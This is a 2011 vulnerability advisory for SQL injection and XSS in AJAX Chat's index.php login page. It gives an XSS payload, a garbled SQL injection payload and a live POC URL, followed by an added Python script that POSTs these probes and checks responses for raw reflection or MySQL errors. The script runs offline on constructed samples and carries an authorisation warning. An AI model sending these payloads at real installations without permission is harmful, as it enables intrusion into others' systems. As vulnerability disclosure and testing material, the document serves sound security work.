# Exploit Title: Ajax Script SQL Injection and XSS Vulnerability
# Date: 2011
# Author: Eyup CELIK
# Version: All versions
# Tested on: All versions are vulnerable
# Web Site: www.eyupcelik.com.tr


ISSUE

SQL injection and cross-site scripting (XSS) are both possible through parameters submitted to index.php with the POST method. The POST body can be modified with a request-tampering tool such as the Tamper Data browser add-on.

Vulnerable Page:
index.php (SQL injection, XSS)


Example payloads:
##xa7 (for SQL injection)
"/></a></><img src=eyup.gif onerror=alert(1)> (for XSS)


POC:
http://www.ajaxchat.org/chat/index.php?branch=login
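
As an added example (this is not code from the advisory or from the AJAX Chat project), the Python script below sends a payload in one POST field of index.php and classifies the response: the XSS payload counts as reflected only if it comes back byte-for-byte, because any HTML encoding of <, > or " would alter it, and a database error string in the body is taken as evidence for the injection. The POST field names userName and password, the target URL, the use of a single quote as the SQL injection probe (the advisory's own payload did not survive extraction) and the MySQL error strings are all assumptions. The three sample responses are constructed so that the checks run offline; probe() is the only part that touches the network and must only be pointed at an installation you are authorised to test.

```python
"""Added example, not part of the original advisory or the AJAX Chat project.

Checks the two behaviours the advisory describes: whether the XSS payload
is echoed back into index.php's response without HTML encoding, and whether
the SQL-injection probe produces a database error in the response. The POST
field names userName/password and the target URL are assumptions; read the
real field names from the login form before using probe() on a live install.
"""
import re
import urllib.parse
import urllib.request

# XSS payload from the advisory, verbatim.
XSS_PAYLOAD = '"/></a></><img src=eyup.gif onerror=alert(1)>'
# The advisory's SQL-injection payload did not survive extraction ("##xa7"),
# so a lone single quote, the usual first probe, is used here (assumption).
SQLI_PAYLOAD = "'"

# Assumed POST parameters of index.php?branch=login (not taken from the page).
ASSUMED_FIELDS = ("userName", "password")

# Substrings that identify a raised database error (MySQL wording, assumed).
SQL_ERROR_PATTERNS = (
    r"You have an error in your SQL syntax",
    r"mysql_fetch_\w+\(\)",
    r"Warning: mysql\w*\(",
    r"supplied argument is not a valid MySQL",
)


def build_post_body(fields: dict) -> bytes:
    """URL-encode POST fields the way a browser (or Tamper Data) sends them."""
    return urllib.parse.urlencode(fields).encode("utf-8")


def reflected_unescaped(body: str, payload: str = XSS_PAYLOAD) -> bool:
    """True when the payload reappears byte-for-byte, i.e. without HTML encoding.

    Escaping any of '<', '>' or '"' changes the payload, so an exact substring
    match is only possible when the server wrote it into the page raw.
    """
    return payload in body


def sql_error_signature(body: str):
    """Return the first database error string found in the response, else None."""
    for pattern in SQL_ERROR_PATTERNS:
        match = re.search(pattern, body)
        if match:
            return match.group(0)
    return None


def classify(body: str) -> dict:
    """Summarise one response: raw XSS reflection and SQL error evidence."""
    return {
        "xss_reflected": reflected_unescaped(body),
        "sql_error": sql_error_signature(body),
    }


def probe(url: str, field: str, payload: str, timeout: float = 10.0) -> str:
    """POST the payload in one field (others blank) and return the body text.

    Network-only; not exercised by the offline demo below.
    """
    fields = {name: "" for name in ASSUMED_FIELDS}
    fields[field] = payload
    req = urllib.request.Request(url, data=build_post_body(fields), method="POST")
    req.add_header("Content-Type", "application/x-www-form-urlencoded")
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode("utf-8", errors="replace")


# Constructed sample responses (not captured from any server) so the checks
# can be run offline.
SAMPLE_RESPONSES = {
    # Vulnerable: value echoed raw, so the quote closes the attribute and the
    # <img onerror> becomes live markup.
    "vulnerable": '<input type="text" name="userName" value="'
                  + XSS_PAYLOAD + '">',
    # Fixed: value passed through htmlspecialchars(), payload inert.
    "escaped": '<input type="text" name="userName" value="'
               '&quot;/&gt;&lt;/a&gt;&lt;/&gt;&lt;img src=eyup.gif '
               'onerror=alert(1)&gt;">',
    # Database error leaking from an unparameterised login query.
    "sql_error": "Warning: mysql_fetch_array(): supplied argument is not a "
                 "valid MySQL result resource in /var/www/chat/index.php",
}


def run_offline_demo() -> dict:
    """Classify each constructed sample; returns {name: classify(body)}."""
    return {name: classify(body) for name, body in SAMPLE_RESPONSES.items()}


if __name__ == "__main__":
    for name, verdict in run_offline_demo().items():
        print(f"{name:10s} {verdict}")
```

To test a live install, call probe("http://host/chat/index.php?branch=login", "userName", XSS_PAYLOAD) and pass the returned body to classify(); a True xss_reflected confirms the page writes the field back without htmlspecialchars(), and a non-empty sql_error after sending SQLI_PAYLOAD shows the login query concatenates user input. An absent error string does not prove the query is safe (blind injection produces none), so the SQL check is evidence, not a verdict.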


Thanks,

Eyup CELIK
Information Technology Security Specialist
http://www.eyupcelik.com.tr